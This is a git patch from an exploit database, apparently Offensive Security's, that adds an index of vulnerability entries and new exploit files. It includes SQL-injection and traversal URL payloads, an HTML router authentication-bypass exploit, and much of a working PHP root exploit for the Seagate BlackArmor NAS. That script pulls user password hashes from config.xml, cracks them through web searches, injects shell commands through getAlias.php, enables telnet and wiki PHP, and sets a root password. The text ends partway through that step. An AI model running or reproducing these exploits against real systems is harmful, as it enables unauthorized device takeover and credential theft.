From a849a67d6623823e353e633c6ae85726bf4176d2 Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Tue, 7 Jan 2014 04:09:46 +0000
Subject: [PATCH] Updated 01_07_2014
---
 files.csv | 42 +-
 platforms/asp/webapps/30743.txt | 9 +
 platforms/asp/webapps/30747.txt | 7 +
 platforms/hardware/remote/30740.html | 82 ++
 platforms/hardware/webapps/30723.php | 1124 ++++++++++++++++++++
 platforms/hardware/webapps/30725.txt | 65 ++
 platforms/hardware/webapps/30726.2013-6922 | 62 ++
 platforms/hardware/webapps/30727.txt | 75 ++
 platforms/linux/dos/30724.txt | 11 +
 platforms/linux/remote/30711.txt | 26 +
 platforms/linux/remote/30736.txt | 21 +
 platforms/linux/remote/30744.txt | 22 +
 platforms/multiple/dos/30713.html | 61 ++
 platforms/multiple/remote/30729.txt | 11 +
 platforms/multiple/remote/30742.txt | 51 +
 platforms/php/webapps/30712.txt | 8 +
 platforms/php/webapps/30715.txt | 9 +
 platforms/php/webapps/30716.txt | 9 +
 platforms/php/webapps/30717.txt | 8 +
 platforms/php/webapps/30718.txt | 9 +
 platforms/php/webapps/30719.txt | 9 +
 platforms/php/webapps/30731.txt | 9 +
 platforms/php/webapps/30732.txt | 9 +
 platforms/php/webapps/30733.txt | 9 +
 platforms/php/webapps/30734.txt | 9 +
 platforms/php/webapps/30735.txt | 9 +
 platforms/php/webapps/30737.txt | 9 +
 platforms/php/webapps/30738.txt | 9 +
 platforms/php/webapps/30739.txt | 7 +
 platforms/php/webapps/30741.txt | 9 +
 platforms/php/webapps/30745.html | 21 +
 platforms/php/webapps/30746.txt | 9 +
 platforms/php/webapps/30748.txt | 9 +
 platforms/php/webapps/30750.pl | 119 +++
 platforms/php/webapps/30751.html | 9 +
 platforms/php/webapps/30752.txt | 9 +
 platforms/php/webapps/30753.txt | 9 +
 platforms/unix/dos/30714.pl | 27 +
 platforms/windows/dos/30749.html | 22 +
 platforms/windows/remote/30720.html | 9 +
 platforms/windows/remote/30730.txt | 12 +
 41 files changed, 2054 insertions(+), 1 deletion(-)
 create mode 100755 platforms/asp/webapps/30743.txt
 create mode 100755 platforms/asp/webapps/30747.txt
 create mode 100755 platforms/hardware/remote/30740.html
 create mode 100755 platforms/hardware/webapps/30723.php
 create mode 100755 platforms/hardware/webapps/30725.txt
 create mode 100755 platforms/hardware/webapps/30726.2013-6922
 create mode 100755 platforms/hardware/webapps/30727.txt
 create mode 100755 platforms/linux/dos/30724.txt
 create mode 100755 platforms/linux/remote/30711.txt
 create mode 100755 platforms/linux/remote/30736.txt
 create mode 100755 platforms/linux/remote/30744.txt
 create mode 100755 platforms/multiple/dos/30713.html
 create mode 100755 platforms/multiple/remote/30729.txt
 create mode 100755 platforms/multiple/remote/30742.txt
 create mode 100755 platforms/php/webapps/30712.txt
 create mode 100755 platforms/php/webapps/30715.txt
 create mode 100755 platforms/php/webapps/30716.txt
 create mode 100755 platforms/php/webapps/30717.txt
 create mode 100755 platforms/php/webapps/30718.txt
 create mode 100755 platforms/php/webapps/30719.txt
 create mode 100755 platforms/php/webapps/30731.txt
 create mode 100755 platforms/php/webapps/30732.txt
 create mode 100755 platforms/php/webapps/30733.txt
 create mode 100755 platforms/php/webapps/30734.txt
 create mode 100755 platforms/php/webapps/30735.txt
 create mode 100755 platforms/php/webapps/30737.txt
 create mode 100755 platforms/php/webapps/30738.txt
 create mode 100755 platforms/php/webapps/30739.txt
 create mode 100755 platforms/php/webapps/30741.txt
 create mode 100755 platforms/php/webapps/30745.html
 create mode 100755 platforms/php/webapps/30746.txt
 create mode 100755 platforms/php/webapps/30748.txt
 create mode 100755 platforms/php/webapps/30750.pl
 create mode 100755 platforms/php/webapps/30751.html
 create mode 100755 platforms/php/webapps/30752.txt
 create mode 100755 platforms/php/webapps/30753.txt
 create mode 100755 platforms/unix/dos/30714.pl
 create mode 100755 platforms/windows/dos/30749.html
 create mode 100755 platforms/windows/remote/30720.html
 create mode 100755 platforms/windows/remote/30730.txt
diff --git a/files.csv b/files.csv
index f816b2123..113d061ef 100755
--- a/files.csv
+++ b/files.csv
@@ -24470,7 +24470,7 @@ id,file,description,date,author,platform,type,port
 27398,platforms/php/webapps/27398.txt,"Pluck CMS 4.7 - HTML Code Injection",2013-08-07,"Yashar shahinzadeh",php,webapps,0
 27399,platforms/php/webapps/27399.txt,"Wordpress Booking Calendar 4.1.4 - CSRF Vulnerability",2013-08-07,"Dylan Irzi",php,webapps,0
 27400,platforms/windows/remote/27400.py,"HP Data Protector Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0
-27401,platforms/windows/remote/27401.py,"Open&Compact FTP Server 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0
+27401,platforms/windows/remote/27401.py,"Open&Compact FTP Server 1.2 (Gabriel's FTP Server) - Auth Bypass & Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0
 27402,platforms/hardware/webapps/27402.txt,"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities",2013-08-07,"Core Security",hardware,webapps,0
 27403,platforms/php/webapps/27403.txt,"Wordpress Usernoise Plugin 3.7.8 - Persistent XSS Vulnerability",2013-08-07,RogueCoder,php,webapps,0
 27405,platforms/php/webapps/27405.txt,"Joomla Sectionex Component 2.5.96 - SQL Injection Vulnerability",2013-08-07,"Matias Fontanini",php,webapps,0
@@ -27548,3 +27548,43 @@ id,file,description,date,author,platform,type,port
 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Vulnerability",2007-10-24,"Aria-Security Team",asp,webapps,0
 30707,platforms/php/webapps/30707.txt,"Phpbasic basicFramework 1.0 Includes.PHP Remote File Include Vulnerability",2007-10-24,Alucar,php,webapps,0
 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 Page.ASP SQL Injection Vulnerability",2007-10-25,joseph.giron13,asp,webapps,0
+30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x Remote Directory Traversal Vulnerability",2007-10-25,"Pete Foster",linux,remote,0
+30712,platforms/php/webapps/30712.txt,"Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities",2007-10-25,KiNgOfThEwOrLd,php,webapps,0
+30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 Sidebar Bookmark Persistent Denial Of Service Vulnerability",2007-10-26,"The Hacker Webzine",multiple,dos,0
+30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 IMAP4 LSUB Buffer Overflow Vulnerability",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0
+30715,platforms/php/webapps/30715.txt,"WordPress 2.3 Edit-Post-Rows.PHP Cross-Site Scripting Vulnerability",2007-10-29,waraxe,php,webapps,0
+30716,platforms/php/webapps/30716.txt,"Smart-Shop index.php Multiple Parameter XSS",2007-10-29,Doz,php,webapps,0
+30717,platforms/php/webapps/30717.txt,"Omnistar Live KB.PHP Cross-Site Scripting Vulnerability",2007-10-29,Doz,php,webapps,0
+30718,platforms/php/webapps/30718.txt,"Saxon 5.4 Menu.PHP Cross-Site Scripting Vulnerability",2007-10-29,netVigilance,php,webapps,0
+30719,platforms/php/webapps/30719.txt,"Saxon 5.4 Example.PHP SQL Injection Vulnerability",2007-10-29,netVigilance,php,webapps,0
+30720,platforms/windows/remote/30720.html,"GlobalLink 2.7.0.8 ConnectAndEnterRoom ActiveX Control Stack Buffer Overflow Vulnerability",2007-10-29,anonymous,windows,remote,0
+30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
+30724,platforms/linux/dos/30724.txt,"Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability",2007-10-31,"Bernhard Mueller",linux,dos,0
+30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
+30726,platforms/hardware/webapps/30726.2013-6922,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
+30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
+30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0
+30730,platforms/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote,0
+30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 Index.PHP Local File Include Vulnerability",2007-11-01,KiNgOfThEwOrLd,php,webapps,0
+30732,platforms/php/webapps/30732.txt,"CONTENTCustomizer 3.1 Dialog.PHP Information Disclosure Vulnerability",2007-11-01,d3hydr8,php,webapps,0
+30733,platforms/php/webapps/30733.txt,"phpMyAdmin <= 2.11.1 Server_Status.PHP Cross-Site Scripting Vulnerability",2007-10-17,"Omer Singer",php,webapps,0
+30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 Admin/Index.PHP Cross Site Scripting Vulnerability",2007-11-02,"Ivan Sanchez",php,webapps,0
+30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 Index.PHP Local File Include Vulnerability",2007-11-03,joseph.giron13,php,webapps,0
+30736,platforms/linux/remote/30736.txt,"GNU Emacs 22.1 Local Variable Handling Code Execution Vulnerability",2007-11-02,"Drake Wilson",linux,remote,0
+30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 Upload_Config.PHP Remote File Include Vulnerability",2007-11-05,"arfis project",php,webapps,0
+30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 Articles.PHP SQL Injection Vulnerability",2007-11-05,R00t[ATI],php,webapps,0
+30739,platforms/php/webapps/30739.txt,"JLMForo System Buscado.PHP Cross-Site Scripting Vulnerability",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0
+30740,platforms/hardware/remote/30740.html,"BT Home Hub 6.2.2.6 Login Procedure Authentication Bypass Vulnerability",2007-11-05,"David Smith",hardware,remote,0
+30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 Index.PHP Local File Include Vulnerability",2007-11-05,"BorN To K!LL",php,webapps,0
+30742,platforms/multiple/remote/30742.txt,"OpenBase 10.0.x Buffer Overflow Vulnerability and Multiple Remote Command Execution Vulnerabilities",2007-11-05,"Kevin Finisterre",multiple,remote,0
+30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 igallery.ASP Remote Information Disclosure Vulnerability",2007-11-05,hackerbinhphuoc,asp,webapps,0
+30744,platforms/linux/remote/30744.txt,"MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability",2007-11-05,"Joe Gallo",linux,remote,0
+30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites Unauthorized Access Vulnerability and HTML Injection Vulnerability",2007-11-06,0x90,php,webapps,0
+30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Vulnerability",2007-11-07,"Giuseppe Gottardi",php,webapps,0
+30747,platforms/asp/webapps/30747.txt,"Rapid Classified AgencyCatResult.ASP SQL Injection Vulnerability",2007-11-08,The-0utl4w,asp,webapps,0
+30748,platforms/php/webapps/30748.txt,"Xoops 2.0.17 1 Mylinks Module Brokenlink.PHP SQL injection Vulnerability",2007-11-09,root@hanicker.it,php,webapps,0
+30749,platforms/windows/dos/30749.html,"Microsoft Office 2003 Web Component Memory Access Violation Denial of Service Vulnerability",2007-11-12,"Elazar Broad",windows,dos,0
+30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 Modules.PHP SQL Injection Vulnerability",2007-11-12,0x90,php,webapps,0
+30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 Login.PHP Cross Site Scripting Vulnerability",2007-11-12,"Hanno Boeck",php,webapps,0
+30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 Rss.PHP Cross-Site Scripting Vulnerability",2007-11-12,"Mesut Timur",php,webapps,0
+30753,platforms/php/webapps/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 Index.PHP Denial of Service Vulnerability",2007-11-12,L4teral,php,webapps,0
diff --git a/platforms/asp/webapps/30743.txt b/platforms/asp/webapps/30743.txt
new file mode 100755
index 000000000..00f81f51f
--- /dev/null
+++ b/platforms/asp/webapps/30743.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26348/info
+
+i-Gallery is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized remote user to view arbitrary local files in the context of the webserver process. Information obtained may aid in further attacks.
+
+i-Gallery 3.4 is vulnerable to this issue; other versions may also be vulnerable.
+
+http://www.example.com/gallery/igallery.asp?d=%5c../../%5c
\ No newline at end of file
diff --git a/platforms/asp/webapps/30747.txt b/platforms/asp/webapps/30747.txt
new file mode 100755
index 000000000..2dde3f163
--- /dev/null
+++ b/platforms/asp/webapps/30747.txt
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/26379/info + +Rapid Classified is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +http://www.example.com/agencyCatResult.asp?cmbCat='%20UPDATE%20rftCategory%20set%20Category%20=%20'Aria-Security Team';-- \ No newline at end of file diff --git a/platforms/hardware/remote/30740.html b/platforms/hardware/remote/30740.html new file mode 100755 index 000000000..c8f6bf362 --- /dev/null +++ b/platforms/hardware/remote/30740.html @@ -0,0 +1,82 @@ +source: http://www.securityfocus.com/bid/26333/info + +BT Home Hub is prone to an authentication-bypass vulnerability. + +An attacker could exploit this issue to gain unauthorized access to the affected device. + +BT Home Hub firmware 6.2.2.6 is vulnerable; other versions may also be affected. + +This exploit allows you to access most pages on a BTHomeHub Router, without needing to know the password. It has been tested to work with firmware version 6.2.2.6. + +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ + + + diff --git a/platforms/hardware/webapps/30723.php b/platforms/hardware/webapps/30723.php new file mode 100755 index 000000000..505e00352 --- /dev/null +++ b/platforms/hardware/webapps/30723.php 
@@ -0,0 +1,1124 @@ + ## + +######################################################################## + +## Public Release v0.2 + +######################################################################## + + + +abstract class MD5Decryptor { + + abstract public function probe($hash); + + + + public static function plain($hash, $class = NULL) + + { + + if ($class === NULL) { + + $class = get_called_class(); + + } else { + + $class = sprintf("MD5Decryptor%s", $class); + + } + + $decryptor = new $class(); + + + + if (count($hash) > 1) { + + foreach ($hash as &$one) { + + $one = $decryptor->probe($one); + + } + + } else { + + $hash = $decryptor->probe($hash); + + } + + return $hash; + + } + + + + public function dictionaryAttack($hash, array $wordlist) + + { + + $hash = strtolower($hash); + + foreach ($wordlist as $word) { + + if (md5($word) === $hash) + + return $word; + + } + + } + +} + + + +abstract class MD5DecryptorWeb extends MD5Decryptor { + + protected $url; + + + + public function getWordlist($hash) + + { + + $list = FALSE; + + $url = sprintf($this->url, $hash); + + if ($response = file_get_contents($url)) { + + $list[$response] = 1; + + $list += array_flip(preg_split("/\s+/", $response)); + + $list += array_flip(preg_split("/(?:\s|\.)+/", $response)); + + $list = array_keys($list); + + } + + return $list; + + } + + public function probe($hash) { + + $hash = strtolower($hash); + + return $this->dictionaryAttack($hash, $this->getWordlist($hash)); + + } + +} + + + +class MD5DecryptorGoogle extends MD5DecryptorWeb { + + protected $url = "http://www.google.com/search?q=%s"; + +} + + + +function portcheck($host, $port) { + + $connection = @fsockopen($host, $port); + + + + if (is_resource($connection)) { + + $port_status = "reachable"; + + fclose($connection); + + } else { + + $port_status = "unreachable"; + + } + + return $port_status; + +} + + + +function authenticate($url, $username, $password) { + + $ch = curl_init(); + + + + curl_setopt($ch, 
CURLOPT_SSL_VERIFYPEER, FALSE); + + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); + + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); + + + + curl_setopt($ch, CURLOPT_HEADER, 1); + + curl_setopt($ch, CURLOPT_POST, true); + + curl_setopt($ch, CURLOPT_POSTFIELDS, "p_user=" . $username . "&p_pass=" . +$password); + + curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); + + curl_setopt($ch, CURLOPT_URL, $url); + + + + curl_exec($ch); + + curl_close($ch); + +} + + + +function RemoteCodeExec($url, $command) { + + $url = $url . "/backupmgt/getAlias.php?ip=" . urlencode("xx +/etc/passwd; ") . urlencode($command) . ";"; + + $handle = fopen($url, "r"); + +} + + + +function RemoteFileExist($url) { + + $ch = curl_init($url); + + + + curl_setopt($ch, CURLOPT_NOBODY, true); + + curl_exec($ch); + + + + $retcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); + + return $retcode; + + curl_close($ch); + +} + + + +function getWikiSecurityToken($url) { + + $curl = curl_init($url); + + curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); + + curl_setopt($curl, CURLOPT_AUTOREFERER, TRUE); + + curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE); + + curl_setopt($curl, CURLOPT_COOKIEFILE, "cookie.txt"); + + + + $html = curl_exec($curl); + + + + $doc = new DOMDocument; + + @$doc->loadHTML($html); + + $tags = $doc->getElementsByTagName('input'); + + + + foreach ($tags as $tag) { + + $search = $tag->getAttribute('value'); + + if (strlen($search) == "32") { + + return $search; + + exit; + + } + + } + +} + + + +$version = "0.2"; + + + +if (!isset($argv[1])) { + + + +echo "------------------------------------------------------------------\n"; + +echo " Seagate BlackArmor NAS Exploit v" . $version . " (c) 2013 - " . +date('Y') . " by J. Diel \n"; + +echo " IT Nerdbox :: http://www.nerdbox.it :: jeroen@nerdbox.it\n"; + +echo "------------------------------------------------------------------\n"; + +echo "\nUsage: php " . $argv[0] . 
" \n\n"; + +echo "Example Usage: php " . $argv[0] . " http://\n"; + +die(); + +} + + + +$curl = curl_init(); + +$url = $argv[1] . "/admin/config.xml"; + + + +curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); + +curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2); + +curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); + +curl_setopt($curl, CURLOPT_URL, $url); + + + +$xmldata = curl_exec($curl); + +$http_status = curl_getinfo($curl, CURLINFO_HTTP_CODE); + +curl_close($curl); + + + +if ($http_status == "0") { + + echo "[Error]: The host was not found!\n\n"; + + die(); + +} + + + +if ($http_status == "404") { + + echo "[Error]: The page was not found! Are you sure this is +a Seagate BlackArmor NAS?\n"; + + die(); + +} + + + +$xml = new SimpleXMLElement($xmldata); + + + +$internal_ip = $xml->xpath("network/lan/ip"); + +$internal_sn = $xml->xpath("network/lan/netmask"); + +$internal_gw = $xml->xpath("network/lan/gateway"); + +$dns0 = $xml->xpath("network/lan/dns0"); + +$dns1 = $xml->xpath("network/lan/dns1"); + + + +echo "------------------------------------------------------------------\n"; + +echo "- Network Details: \n"; + +echo "------------------------------------------------------------------\n"; + + + +echo "- IP Address : " . $internal_ip[0] . "/" . $internal_sn[0] . +"\n"; + +echo "- Gateway / Router : " . $internal_gw[0] . "/" . $internal_sn[0] . +"\n"; + +echo "- 1st DNS Server : " . $dns0[0] . "\n"; + +echo "- 2nd DNS Server : " . $dns1[0] . "\n\n"; + + + + + +$serv_pnp = $xml->xpath("network/service/upnp/enable"); + +$serv_ftp = $xml->xpath("network/service/ftp/enable"); + +$serv_ftp_port = $xml->xpath("network/service/ftp/fport"); + +$serv_nfs = $xml->xpath("network/service/nfs/enable"); + + + +echo "------------------------------------------------------------------\n"; + +echo "- Network Services: \n"; + +echo "------------------------------------------------------------------\n"; + +$host = explode("/", $argv[1]); + +$host = $host[2]; + + + +echo "- uPNP : " . 
$serv_pnp[0] . "\n"; + +echo "- FTP : " . $serv_ftp[0] . " (port: " . +$serv_ftp_port[0] . " - " . portcheck("$host", "$serv_ftp_port[0]") . ")\n"; + +echo "- NFS : " . $serv_nfs[0] . "\n\n"; + + + +$shares = $xml->xpath("shares/nasshare/sharename"); + +$cnt = count($shares); + + + +echo "------------------------------------------------------------------\n"; + +echo "- Network Shares: " . $cnt . "\n"; + +echo "------------------------------------------------------------------\n"; + + + +for ($i=0; $i<$cnt; $i++) { + + echo "- " . $shares[$i] . "\n"; + +} + +echo "\n"; + + + +$username = $xml->xpath("access/users/nasuser/username"); + + + +while(list( , $node) = each ($username)) { + + $users[] = $node; + +} + + + +$md5hash = $xml->xpath("access/users/nasuser/htusers"); + + + +while(list( , $node) = each ($md5hash)) { + + $md5s[] = $node; + +} + + + +$max = count($users); + + + +echo "------------------------------------------------------------------\n"; + +echo "- User hashes found: \n"; + +echo "------------------------------------------------------------------\n"; + + + +$pwdcount = 0; + + + +for ($i=0; $i<$max; $i++) { + + + + $file = "md5.hash"; + + $fh = fopen($file, (file_exists($file)) ? "a" : "w"); + + fclose($fh); + + + + $contents = file_get_contents($file); + + $pattern = preg_quote($md5s[$i], "/"); + + $pattern = "/^.*$pattern.*\$/m"; + + + + if (preg_match_all($pattern, $contents, $matches)){ + + $pwdcount++; + + + + if ($users[$i] != "admin") { + + } else { + + $admin_found = "1"; + + $admin_password = explode(":", implode("\n", $matches[0])); + + } + + echo "- " . implode("\n", $matches[0]) . " (username: " . $users[$i] . +")\n"; + + $next_user = $users[$i]; + + $next_pass = explode(":", implode("\n", $matches[0])); + + + + } else { + + $hashes[] = array("$md5s[$i]", "$users[$i]"); + + echo "- " . $md5s[$i] . " (username: " . $users[$i] . 
")\n"; + + } + +} + + + +if ($pwdcount == 0) { + + echo +"\n------------------------------------------------------------------\n"; + + echo "- No passwords could be found in local storage! \n"; + + echo +"------------------------------------------------------------------\n"; + + echo "- Search for hashes online? Type 'yes' to continue: "; + + + + $handle = fopen ("php://stdin","r"); + + $line = fgets($handle); + + + + if(trim($line) == "yes"){ + + $decryptors = array("Google"); + + + + echo +"\n------------------------------------------------------------------\n"; + + echo "- Searching online for passwords: \n"; + + echo +"------------------------------------------------------------------\n"; + + foreach ($hashes as $hash) { + + echo "- " . $hash[0]; + + foreach($decryptors as $decrytor) { + + if (NULL !== ($plain = +MD5Decryptor::plain($hash[0], $decrytor))) { + + echo " - found: $plain"; + + $pwdcount++; + + + + $next_user = +$hash[1]; + + $next_pass = +$plain; + + + + if +($next_user == "admin") { + + +$admin_found = "1"; + + +$admin_pass = $plain; + + } + + + + $fh = +fopen($file, (file_exists($file)) ? "a" : "w"); + + fwrite($fh, +$hash[0] . ":" . $plain . "\n"); + + fclose($fh); + + break; + + } else { + + echo " - not found!"; + + } + + } + + echo "\n"; + + } + + + + } + +} + + + +if ($pwdcount != 0) { + + echo "\nTotal number of passwords found: " . $pwdcount . 
"\n\n"; + + echo +"------------------------------------------------------------------\n"; + + echo "- Services: \n"; + + echo +"------------------------------------------------------------------\n"; + + + + if (isset($admin_found)) { + + $telnet_user = "admin"; + + if (isset($admin_password[1])) { + + $telnet_pass = $admin_password[1]; + + } else { + + $telnet_pass = $admin_pass; + + } + + } else { + + $telnet_user = $next_user; + + $telnet_pass = $next_pass[1]; + + } + + + + $telnet_status = portcheck("$host", "23"); + + + + if ($telnet_status == "reachable") { + + echo "- The telnet daemon is already running: [skipped]\n"; + + } else { + + + + echo "- Enable the telnet daemon? Type 'yes' to continue: "; + + + + $handle = fopen ("php://stdin","r"); + + $line = fgets($handle); + + + + if(trim($line) != "yes"){ + + } else { + + echo "- Trying to start the telnet daemon : "; + + + + $url = $argv[1]; + + + + authenticate($url, $telnet_user, $telnet_pass); + + + + $ch = curl_init(); + + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); + + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); + + curl_setopt($ch, CURLOPT_POST, false); + + curl_setopt($ch, CURLOPT_HTTPHEADER, + + array( + + "Authorization: Basic SmVXYWI6c3lzYWRtaW4=" + + )); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); + + curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); + + curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); + + curl_setopt($ch, CURLOPT_URL, $url . 
+"/admin/sxmJEWAB/SXMjewab.php?telnet=jewab&debug=1"); + + curl_setopt($ch, CURLOPT_TIMEOUT, 5); + + curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,5); + + curl_exec($ch); + + curl_close($ch); + + + + echo "[done]\n"; + + echo "- Verifiying telnet daemon status : "; + + + + $telnet_status = portcheck("$host", "23"); + + if ($telnet_status == "reachable") { + + echo "[verified]\n"; + + } else { + + echo "[error]\n"; + + echo "- This is possible if portforwarding is not +enabled for telnet\n"; + + } + + } + + } + + + + $xml = new SimpleXMLElement($xmldata); + + $wiki = $xml->xpath("enableddokuwikiserver"); + + $wiki = $wiki[0]; + + + + if ($wiki == "yes") { + + echo "- The Wiki server is enabled : [skipped]\n"; + + } else { + + echo "- Enabeling the Wiki server : "; + + + + $url = $argv[1]; + + $ch = curl_init(); + + + + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); + + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); + + curl_setopt($ch, CURLOPT_POST, true); + + curl_setopt($ch, CURLOPT_POSTFIELDS, +'enablewiki=yes&agree=yes&btn=Submit'); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); + + curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); + + curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); + + curl_setopt($ch, CURLOPT_URL, $url . '/admin/dokuwiki_service.php'); + + + + curl_exec($ch); + + curl_close($ch); + + + + echo "[done]\n"; + + } + + + + echo "- Retrieving wiki security token : "; + + $sectok = getWikiSecurityToken($argv[1] . +"/wiwiki/doku.php?do=login&id=start"); + + + + if (isset($sectok)) { + + echo "[found]\n"; + + } else { + + echo "[Not Found]\n"; + + exit; + + } + + + + if (isset($admin_found)) { + + echo "- Logging in to the wiki server : "; + + $url = $argv[1]; + + $ch = curl_init(); + + + + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); + + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); + + curl_setopt($ch, CURLOPT_POST, true); + + curl_setopt($ch, CURLOPT_POSTFIELDS, "u=" . $telnet_user . "&p=" . +$telnet_pass . "§ok=" . 
$sectok ."&do=login&id=start"); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + + curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); + + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); + + + + curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); + + curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); + + curl_setopt($ch, CURLOPT_URL, $url . "/wiwiki/doku.php"); + + + + curl_exec($ch); + + $http_status = curl_getinfo($ch, CURLINFO_HTTP_CODE); + + curl_close($ch); + + + + echo "[done]\n"; + + + + echo "- Enabling PHP in wiki server : "; + + $sectok = getWikiSecurityToken($url . +"/wiwiki/doku.php?id=start&do=admin&page=config"); + + + + $ch = curl_init(); + + + + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); + + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); + + curl_setopt($ch, CURLOPT_POST, true); + + curl_setopt($ch, CURLOPT_POSTFIELDS, "config[phpok]=1§ok=" . +$sectok . "&do=admin&page=config&save=1&submit=Save"); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + + curl_setopt($ch, CURLOPT_AUTOREFERER, 1); + + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); + + + + curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); + + curl_setopt($ch, CURLOPT_URL, $url . "/wiwiki/doku.php?id=start"); + + + + curl_exec($ch); + + curl_close($ch); + + + + echo "[done]\n"; + + echo +"\n------------------------------------------------------------------\n"; + + echo "- Rooting the NAS: \n"; + + echo +"------------------------------------------------------------------\n"; + + echo "- Enter the new root password: "; + + + + $handle = fopen ("php://stdin","r"); + + $line = fgets($handle); + + + + if(trim($line) == ""){ + + $root_password = "mypassword"; + + echo "- No root password chosen! Setting our own: '" . +$root_password . 
